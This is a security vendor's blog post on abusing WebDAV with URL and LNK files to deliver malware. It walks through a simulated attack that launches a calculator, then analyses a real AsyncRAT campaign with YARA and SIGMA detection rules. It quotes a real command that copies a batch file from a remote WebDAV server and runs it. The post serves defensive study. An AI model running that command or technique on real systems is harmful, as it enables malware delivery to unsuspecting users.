{"id":7560,"date":"2024-04-08T09:50:07","date_gmt":"2024-04-08T09:50:07","guid":{"rendered":"\/cybersecurity-blog\/?p=7560"},"modified":"2025-01-31T05:41:30","modified_gmt":"2025-01-31T05:41:30","slug":"client-side-exploitation","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/client-side-exploitation\/","title":{"rendered":"Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads"},"content":{"rendered":"\n<p>A look at the offensive and defensive angles.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What is WebDAV?\u00a0<\/h2>\n\n\n\n<p>WebDAV, short for Web Distributed Authoring and Versioning, is an extension of the Hypertext Transfer Protocol (HTTP).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">What is WebDAV used for<\/h2>\n\n\n\n<p>WebDAV is used for managing files on web servers. It allows users to create, edit, move, and delete files directly on a server. Many organizations use a WebDAV client to facilitate easier interaction with WebDAV-enabled servers.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How attackers abuse WebDAV<\/h2>\n\n\n\n<p>Attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user&#8217;s PC using scripts or other methods. One type of server attackers can leverage is WebDAV (Web Distributed Authoring and Versioning) \u2014 a file transfer protocol built on top of HTTP.&nbsp;<\/p>\n\n\n\n<p>In this article, we&#8217;ll explore how a WebDAV vulnerability attack is carried out from the offensive perspective, and then examine how to detect and defend against it defensively.\u00a0<\/p>\n\n\n\n<p>First, we&#8217;ll simulate an attack using a WebDAV server targeting a client PC to understand what it looks like offensively. Then from the defensive side, we&#8217;ll analyze a real-world example that loads malware like AsyncRat\/Purelogs, discuss detection methods, and write some detection rules.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The offensive view&nbsp;<\/h2>\n\n\n\n<p>To simulate <a href=\"https:\/\/app.any.run\/tasks\/e28163e3-47ef-4d79-b535-048d40d93672\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktoservice&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">the attack<\/a>, we need two hosts: one running a Linux OS (we&#8217;ll use Kali Linux), and the other running Windows (we&#8217;ll use the ANY.RUN virtual machine).&nbsp;<\/p>\n\n\n\n<p>First, let&#8217;s connect the <a href=\"http:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktolanding&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN Sandbox<\/a> to the local network (if unsure how, check <a href=\"https:\/\/any.run\/cybersecurity-blog\/monikerlink-sandbox-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">this article<\/a>). We&#8217;ll use <strong>ping <\/strong>command to verify connectivity:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"377\" height=\"124\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-1.png\" alt=\"\" class=\"wp-image-7562\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-1.png 377w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-1-300x99.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-1-370x122.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-1-270x89.png 270w\" sizes=\"(max-width: 377px) 100vw, 377px\" \/><figcaption class=\"wp-element-caption\">Successful connection to the attacker&#8217;s host<\/figcaption><\/figure><\/div>\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nDon&#8217;t have an <span class=\"highlight\">ANY.RUN<\/span> account yet?<br>Get started now!&nbsp;\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=webdav_attack_analysis&#038;utm_term=080424&#038;utm_content=linktoregistration#register\/\" rel=\"noopener\" target=\"_blank\">\nRegister for free\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>Next, we&#8217;ll create a shortcut file (LNK) that launches the calculator using the command line:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"384\" height=\"390\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1.jpg\" alt=\"\" class=\"wp-image-7563\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1.jpg 384w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-295x300.jpg 295w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-70x70.jpg 70w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-370x376.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/1-270x274.jpg 270w\" sizes=\"(max-width: 384px) 100vw, 384px\" \/><figcaption class=\"wp-element-caption\">Properties of the created LNK file&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Since the shortcut needs to be on a remote WebDAV server to auto-download and execute, we&#8217;ll upload it using the <strong>scp <\/strong>command:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"941\" height=\"72\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1.png\" alt=\"\" class=\"wp-image-7564\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1.png 941w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1-300x23.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1-768x59.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1-370x28.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1-270x21.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-1-740x57.png 740w\" sizes=\"(max-width: 941px) 100vw, 941px\" \/><figcaption class=\"wp-element-caption\">The file was successfully copied to the attacking server.<\/figcaption><\/figure><\/div>\n\n\n<p>For added stealth, instead of directly accessing the LNK, we&#8217;ll add a proxy stage \u2014 a URL pointing to a file containing the link to the attacking WebDAV server hosting the LNK. This URL file is what the victim will run:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"254\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2.jpg\" alt=\"\" class=\"wp-image-7565\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2.jpg 357w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-300x213.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/2-270x192.jpg 270w\" sizes=\"(max-width: 357px) 100vw, 357px\" \/><figcaption class=\"wp-element-caption\">URL file linking to the tag&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The last preparation step is to start the WebDAV server. We&#8217;ll use the WsgiDAV server for this. Connect to the attacking server via SSH:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"911\" height=\"419\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2.png\" alt=\"\" class=\"wp-image-7566\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2.png 911w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2-300x138.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2-768x353.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2-370x170.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2-270x124.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-2-740x340.png 740w\" sizes=\"(max-width: 911px) 100vw, 911px\" \/><figcaption class=\"wp-element-caption\">Sucesfull SSH connection<\/figcaption><\/figure><\/div>\n\n\n<p>Then we can start the Web DAV server on port 3001 using the current working directory:\u00a0<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"905\" height=\"389\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1.png\" alt=\"\" class=\"wp-image-7567\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1.png 905w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1-300x129.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1-768x330.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1-370x159.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1-270x116.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1-740x318.png 740w\" sizes=\"(max-width: 905px) 100vw, 905px\" \/><figcaption class=\"wp-element-caption\">WebDAV server has started on port 3001&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Everything is ready, now we just need to execute the URL file:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"566\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1.png\" alt=\"\" class=\"wp-image-7568\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1.png 871w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1-300x195.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1-768x499.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1-370x240.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1-270x175.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-1-740x481.png 740w\" sizes=\"(max-width: 871px) 100vw, 871px\" \/><figcaption class=\"wp-element-caption\">Result of executing the command&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>We see the command executed successfully and the calculator launched. Meanwhile, the WebDAV server logs show the connection from the user&#8217;s computer:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"223\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-1024x223.png\" alt=\"\" class=\"wp-image-7569\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-1024x223.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-300x65.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-768x167.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-370x81.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-270x59.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1-740x161.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/6-1.png 1245w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">LNK file download logs from WebDav server<\/figcaption><\/figure><\/div>\n\n\n<p>Now we understand what a client-side WebDAV exploit looks like offensively. Let&#8217;s examine a real-world example found in our public submissions.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The defensive view<\/h2>\n\n\n\n<p>As an example, we will partially analyze <a href=\"https:\/\/app.any.run\/tasks\/86851211-8c9c-4e23-af71-b62d6cbfe14c\/\" target=\"_blank\" rel=\"noreferrer noopener\">this task<\/a>. In this example, the attack started with a phishing email and ended with <a href=\"https:\/\/any.run\/malware-trends\/asyncrat\" target=\"_blank\" rel=\"noreferrer noopener\">AsyncRAT<\/a>, PureLogs, and other malware being downloaded. The execution chain was:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"291\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-1024x291.jpg\" alt=\"\" class=\"wp-image-7570\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-1024x291.jpg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-300x85.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-768x218.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-1536x436.jpg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-370x105.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-270x77.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3-740x210.jpg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/3.jpg 1626w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Visualization of the execution chain&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>While there are many IOCs and detection vectors, we&#8217;ll focus on those directly relating to WebDAV exploitation:&nbsp;<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>The URL file linking to the LNK malware \u00a0<\/li>\n<\/ol>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>The LNK file containing malicious commands&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol start=\"3\" class=\"wp-block-list\">\n<li>The network connection to the attacking server&nbsp;<\/li>\n<\/ol>\n\n\n\n<p>Like our simulation, the actual attack used a URL file delivered in a zipped Dropbox download. This URL contained a link to the malicious LNK file:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"312\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-1.png\" alt=\"\" class=\"wp-image-7571\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-1.png 719w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-1-300x130.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-1-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/7-1-270x117.png 270w\" sizes=\"(max-width: 719px) 100vw, 719px\" \/><figcaption class=\"wp-element-caption\">Contents of the URL of the file the user is executing viewed in <a href=\"http:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=webdav_attack_analysis&amp;utm_content=linktolanding&amp;utm_term=080424\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN sandbox<\/a>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nFollow along with the defensive view <span class=\"highlight\">example in ANY.RUN<\/span>&nbsp;\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=webdav_attack_analysis&#038;utm_term=080424&#038;utm_content=linktoregistration#register\/\" rel=\"noopener\" target=\"_blank\">\nSign up for free\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>Interestingly, the file points to the TryCloudFlare phishing domain, and the port is specified as SSL instead of a number. We also see the link contains the WebDAV directory name <strong>DavWWWRoot<\/strong> and the <strong>.lnk<\/strong> extension.&nbsp;<\/p>\n\n\n\n<p>To detect such a malicious URL file, we can create a YARA rule:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap;\">rule url_file \n{  \n    meta:  \n        author = \"ANY.RUN\"  \n        description = \"Rule identifying shortcut (LNK) with cmd command copy and start bat\"  \n    strings:  \n        $url_lnk = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75 74 5D }  \/\/[InternetShortcut]  \n        $url_file = \"URL=file:\/\/\" ascii \n    condition:  \n        $url_lnk at 0 and $url_file  \n} <\/code><\/pre>\n\n\n\n<p>When the user launches the malicious URL file, an LNK file with a randomly generated GUID name is saved to the temporary Tfs_DAV directory.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"143\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-1024x143.png\" alt=\"\" class=\"wp-image-7572\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-1024x143.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-300x42.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-768x108.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-370x52.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-270x38.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1-740x104.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/8-1.png 1314w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Examining the created LNK, we see it contains a CMD command to copy a BAT file from the WebDAV server directory to %USERPROFILE%\\Pictures on the user&#8217;s PC, and then execute it:&nbsp;<\/p>\n\n\n\n<p>C:\\Windows\\System32\\cmd.exe \/c copy &#8220;\\101.99[.]94.234@9809\\DavWWWRoot\\file.bat&#8221; &#8220;%USERPROFILE%\\Pictures\\file.bat&#8221; &amp;&amp; &#8220;%USERPROFILE%\\Pictures\\file.bat&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1024x469.jpg\" alt=\"\" class=\"wp-image-7573\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1024x469.jpg 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-300x138.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-768x352.jpg 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-1536x704.jpg 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-370x170.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-270x124.jpg 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4-740x339.jpg 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/4.jpg 1800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Since the malicious LNK is created <em>on disk<\/em>, we can write a YARA hunting rule to detect it:&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap;\">rule lnk_file  \n{   \n    meta:   \n        author = \"ANY.RUN\"   \n        description = \"Rule identifying shortcut (LNK) with WebDAV\"   \n    strings:   \n        $lnk = { 4C 00 00 00 01 14 02 00 }   \n        $webdav = \/\\\\\\\\&#91;0-9]{1,3}\\.&#91;0-9]{1,3}\\.&#91;0-9]{1,3}\\.&#91;0-9]{1,3}@\\d{2,4}\/ wide \n    condition:   \n        $lnk at 0 and $webdav   \n} <\/code><\/pre>\n\n\n\n<p>We also see that when the malicious LNK is executed, a specific command line is used that points to the remote server. We can detect this pattern using a SIGMA rule:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code style=\"white-space: pre-wrap;\">title: WebDav in cmdline  \nstatus: test  \ndescription: Detects WebDav in cmdline   \nreferences: https:\/\/app.any.run\/tasks\/86851211-8c9c-4e23-af71-b62d6cbfe14c\/  \nauthor: ANY.RUN  \ndate: 2024\/04\/21  \ntags: attack.t1071.001  \nlogsource:  \n    category: process_creation  \n    product: windows  \ndetection:  \n    selection_target:  \n        CommandLine||re: \"\\\\\\\\.+@.+\\\\\"  \n    selection_image:  \n        Image|endswith:  \n        -'\\cmd.exe' \n        -'\\powershell.exe' \n    condition: selection_target and selection_image \nfalsepositives:   \n    unknown  \nlevel: medium <\/code><\/pre>\n\n\n\n<p>As a result, the payload is downloaded from the remote server, creating network connection artifacts that we can detect.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"633\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5.jpg\" alt=\"\" class=\"wp-image-7574\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5.jpg 735w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-300x258.jpg 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-370x319.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/5-270x233.jpg 270w\" sizes=\"(max-width: 735px) 100vw, 735px\" \/><\/figure><\/div>\n\n\n<p>Having the network connection allows us to add another Suricata rule for detection:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"736\" height=\"271\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/9-1.png\" alt=\"\" class=\"wp-image-7575\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/9-1.png 736w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/9-1-300x110.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/9-1-370x136.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/9-1-270x99.png 270w\" sizes=\"(max-width: 736px) 100vw, 736px\" \/><\/figure><\/div>\n\n\n<p>To match the WebDAV link itself, we can use this regular expression in a tool like CyberChef:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"940\" height=\"226\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2.png\" alt=\"\" class=\"wp-image-7586\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2.png 940w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2-300x72.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2-768x185.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2-370x89.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2-270x65.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2024\/04\/10-2-740x178.png 740w\" sizes=\"(max-width: 940px) 100vw, 940px\" \/><figcaption class=\"wp-element-caption\">Link to&nbsp;<a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=Regular_expression('User%20defined','%5C%5Cx5c%5C%5Cx00%5C%5Cx5c(?:%5C%5Cx00%5Ba-z0-9%5C%5C.%5C%5C-%5C%5C_%5D)%2B%5C%5Cx00@',true,true,false,false,false,false,'List%20matches')Remove_null_bytes()&amp;input=TAAAAAEUAgAAAAAAwAAAAAAAAEb7AAgAIAAAAKFKeMAXC9oB2Qp9wBcL2gHZCn3AFwvaAQBABAABAAAABwAAAAAAAAAAAAAAAAAAADUBFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAAAAAAAAAAAAAAVgAxAAAAAABFWBeQEABXaW5kb3dzAEAACQAEAO%2B%2BL00uMUVYF5AuAAAAAQIAAAAAAQAAAAAAAAAAAAAAAAAAAFAAPgBXAGkAbgBkAG8AdwBzAAAAFgBaADEAAAAAAEdYtYYQAFN5c3RlbTMyAABCAAkABADvvi9NLjFHWLWGLgAAANgMAAAAAAEAAAAAAAAAAAAAAAAAAAC%2B1SQAUwB5AHMAdABlAG0AMwAyAAAAGABWADIAAEAEAF5Xa08gAGNtZC5leGUAQAAJAAQA775eV2tPXldrTy4AAACreAQAAAABAAAAAADcAAAAAAAAAAAAJy4MAWMAbQBkAC4AZQB4AGUAAAAWAAAASgAAABwAAAABAAAAHAAAAC0AAAAAAAAASQAAABEAAAADAAAA1WnKAhAAAAAAQzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlAAAhAC4ALgBcAC4ALgBcAC4ALgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlAEMAXABcAGQAZQBhAGwAZQByAC0AaABlAGEAbAB0AGgAYwBhAHIAZQAtAHQAaABpAG4AawBwAGEAZAAtAHgAZQByAG8AeAAuAHQAcgB5AGMAbABvAHUAZABmAGwAYQByAGUALgBjAG8AbQBAAFMAUwBMAFwARABhAHYAVwBXAFcAUgBvAG8AdAALAC8AYwAgAGMAYQBsAGMALgBlAHgAZQAhACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAFwAUwB5AHMAdABlAG0AMwAyAFwAUwBIAEUATABMADMAMgAuAGQAbABsABAAAAAFAACgJQAAAN0AAAAcAAAACwAAoHdOwRrnAl1Ot0Qusa5RmLfdAAAAYAAAAAMAAKBYAAAAAAAAAHdpbi0wb3FqNm5pdG9ibgBOxUSPGwpuSY8KWver%2BA4eem9wybCT7hGAn7oB6cp6UE7FRI8bCm5Jjwpa96v4Dh56b3DJsJPuEYCfugHpynpQrQIAAAkAAKCJAAAAMVNQU%2B0wvdpDAIlHp\/jQE6RzZiJtAAAAZAAAAAAfAAAALQAAAHYAMQAuADAAIAAoAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAKQAAAAAAAAAAAIkAAAAxU1BT4opYRrxMOEO7\/BOTJphtzm0AAAAEAAAAAB8AAAAuAAAAUwAtADEALQA1AC0AMgAxAC0ANAAxADcANwA5ADAANQAwADcAOAAtADMAOAAyADUANAAzA